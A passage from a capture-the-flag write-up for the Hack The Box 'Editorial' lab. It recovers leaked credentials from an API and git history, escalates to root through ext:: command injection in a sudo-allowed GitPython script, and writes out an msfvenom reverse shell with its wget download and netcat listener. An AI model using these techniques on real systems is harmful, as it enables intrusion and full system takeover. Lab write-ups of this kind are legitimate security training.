API Enumeration
Let's make a list of the valid API endpoints and send them back through our script.
api/latest/metadata/messages/promos
api/latest/metadata/messages/coupons
api/latest/metadata/messages/authors
api/latest/metadata/messages/how_to_use_platform
api/latest/metadata
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ parallel -j 2 ./parallel-fuzznrequest.sh {} :::: apiendpointlist.txt
Submitting - api/latest/metadata/messages/promos
Requesting - http://editorial.htb/static/uploads/d5c39e43-ebf9-47cf-8c2e-683274a34ffd
Submitting - api/latest/metadata/messages/coupons
Requesting - http://editorial.htb/static/uploads/3dd1cacc-9e38-4ab6-91e3-a8f9dea9bf3a
Submitting - api/latest/metadata/messages/authors
Requesting - http://editorial.htb/static/uploads/b6dc3015-f311-438f-8dda-199f6771885d
Submitting - api/latest/metadata/messages/how_to_use_platform
Requesting - http://editorial.htb/static/uploads/f9498522-5f21-4d8f-ae2d-01340d1202af
Submitting - api/latest/metadata
Requesting - http://editorial.htb/static/uploads/25d25b41-4fa9-462e-9eb9-b16bc934155d
Upon reviewing the files, it looks like two endpoints returned data: a couple of promo codes and a set of credentials!
[{"2anniversaryTWOandFOURread4":{"contact_email_2":"[email protected]","valid_until":"12/02/2024"}},{"frEsh11bookS230":{"contact_email_2":"[email protected]","valid_until":"31/11/2023"}}]
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
We now have the credentials dev:dev080217_devAPI!@. Everyone changes their password when you ask them to… right?
Initial OS Foothold & Enumeration
Nope.
┌──(kali㉿kali)-[~/HTB/editorial/fuzz]
└─$ ssh [email protected]
<SNIP>
dev@editorial:~$
Since there isn’t a login page on the site I’m aware of, I immediately tried SSH and was successful.
Unfortunately, this user has no sudo permissions. Time to grab the user flag and do some more enumeration.
dev@editorial:~$ ls -la
total 36
drwxr-x--- 5 dev dev 4096 Apr 25 00:52 .
drwxr-xr-x 4 root root 4096 Jun 5 2024 ..
drwxrwxr-x 5 dev dev 4096 Apr 25 00:51 apps
lrwxrwxrwx 1 root root 9 Feb 6 2023 .bash_history -> /dev/null
-rw-r--r-- 1 dev dev 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 dev dev 3771 Jan 6 2022 .bashrc
drwx------ 2 dev dev 4096 Jun 5 2024 .cache
drwx------ 3 dev dev 4096 Apr 25 00:35 .gnupg
-rw-r--r-- 1 dev dev 807 Jan 6 2022 .profile
-rw-r----- 1 root dev 33 Apr 25 00:29 user.txt
dev@editorial:~$ cat user.txt
[FLAG REDACTED]
Looking around their home directory, we notice an apps folder. Inside it lies a hidden .git directory.
dev@editorial:~$ ls -laR apps
apps:
total 12
drwxrwxr-x 3 dev dev 4096 Apr 25 00:54 .
drwxr-x--- 5 dev dev 4096 Apr 25 00:52 ..
drwxr-xr-x 9 dev dev 4096 Apr 25 00:48 .git
apps/.git:
total 60
drwxr-xr-x 9 dev dev 4096 Apr 25 00:48 .
drwxrwxr-x 3 dev dev 4096 Apr 25 00:54 ..
drwxr-xr-x 2 dev dev 4096 Jun 5 2024 branches
-rw-r--r-- 1 dev dev 253 Jun 4 2024 COMMIT_EDITMSG
-rw-r--r-- 1 dev dev 177 Apr 25 00:42 config
-rw-r--r-- 1 dev dev 73 Jun 4 2024 description
-rw-rw-r-- 1 dev dev 0 Apr 25 00:48 FETCH_HEAD
drwxrwxr-x 7 dev dev 4096 Apr 25 00:48 .git
-rw-r--r-- 1 dev dev 23 Jun 4 2024 HEAD
drwxr-xr-x 2 dev dev 4096 Jun 5 2024 hooks
-rw-r--r-- 1 dev dev 6163 Jun 4 2024 index
drwxr-xr-x 2 dev dev 4096 Jun 5 2024 info
drwxr-xr-x 3 dev dev 4096 Jun 5 2024 logs
drwxr-xr-x 70 dev dev 4096 Apr 25 00:48 objects
drwxr-xr-x 4 dev dev 4096 Jun 5 2024 refs
The repository seems to be missing its working-tree files; only the .git directory is present. We might be able to restore them.
dev@editorial:~/apps$ ls
dev@editorial:~/apps$ git restore *
dev@editorial:~/apps$ ls
app_api app_editorial
dev@editorial:~/apps$
Success!
I dug around in the project files and couldn't find anything. I tried LinPEAS and manual enumeration as well and found nothing of value. I spent more time on this than I'd like to admit.
I decided to revisit the project files in the git repo and discovered that we can check the git log and view the commit history! Sometimes, a little --help is all you need!
dev@editorial:~/apps$ git log
commit 8ad0f3187e2bda88bba85074635ea942974587e8 (HEAD -> master)
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 21:04:21 2023 -0500
fix: bugfix in api port endpoint
commit dfef9f20e57d730b7d71967582035925d57ad883
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 21:01:11 2023 -0500
change: remove debug and update api port
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
commit 1e84a036b2f33c59e2390730699a488c65643d28
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 20:51:10 2023 -0500
feat: create api to editorial info
* It (will) contains internal info about the editorial, this enable
faster access to information.
commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 20:48:43 2023 -0500
feat: create editorial app
* This contains the base of this project.
* Also we add a feature to enable to external authors send us their
books and validate a future post in our editorial.
Interesting! This code was downgraded from prod to dev at some point. Let’s take a look at that version.
dev@editorial:~/apps$ git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <[email protected]>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------
Now we're getting somewhere! Another set of credentials: prod:080217_Producti0n_2023!@. Let's use these and try to su to prod.
Enumeration of the “Prod” User
dev@editorial:~/apps$ su prod
Password:
prod@editorial:/home/dev/apps$
Checking sudo -l reveals a python script that we can run as root!
prod@editorial:/opt/internal_apps/clone_changes$ cd ~
prod@editorial:~$ sudo -l
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
Let’s check out the script:
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
I don't see any sanitization of the user input, and the script explicitly enables the ext:: transport (protocol.ext.allow=always), so I'm guessing this is vulnerable to command injection.
After a while of trying, and failing, to craft my own command injection payloads, I took to Google and found this: https://github.com/gitpython-developers/GitPython/issues/1515
'ext::sh -c touch% /tmp/pwned'
Instead of using that, we’ll change the command to whoami to see if the privileges are kept during execution, as we would expect.
prod@editorial:/opt/internal_apps/clone_changes$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c whoami'
<SNIP>
stderr: 'Cloning into 'new_changes'...
fatal: protocol error: bad line length character: root
'
Beautiful! It looks like the injection is working and is executing as root.
Now to craft a shell. Instead of messing with the injection syntax and the odd “%” separator, I just made an executable reverse shell with msfvenom on my attack box.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=4242 -f elf -o reverse.elf
I used a python HTTP server to host the file on my attack box, then used wget on the target to download it into the /tmp/ directory. After that, I set the file as executable.
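The commands for that look roughly like this (attack box first, then the target):
# On the attack box, serve the payload from the directory containing reverse.elf
python3 -m http.server 8000
# On the target, fetch it into /tmp and make it executable
wget http://10.10.14.13:8000/reverse.elf -O /tmp/reverse.elf
chmod +x /tmp/reverse.elf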
Now we’ll start a listener on our attack box:
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
Then try our payload and cross our fingers:
Target:
prod@editorial:/opt/internal_apps/clone_changes$ sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c /tmp/reverse.elf'
Attack box:
┌──(kali㉿kali)-[~/HTB/editorial]
└─$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.20] 46438
whoami
root
cat /root/root.txt
[FLAG REDACTED]
Success! I immediately received a root shell and was able to grab the flag!
Rooting the box was great, but the real fun was learning through the mistakes, frustration, and experiments.
This is my first published write-up, and I wanted it to reflect the real process — messy, challenging, and full of lessons.
Thanks for coming along for the ride!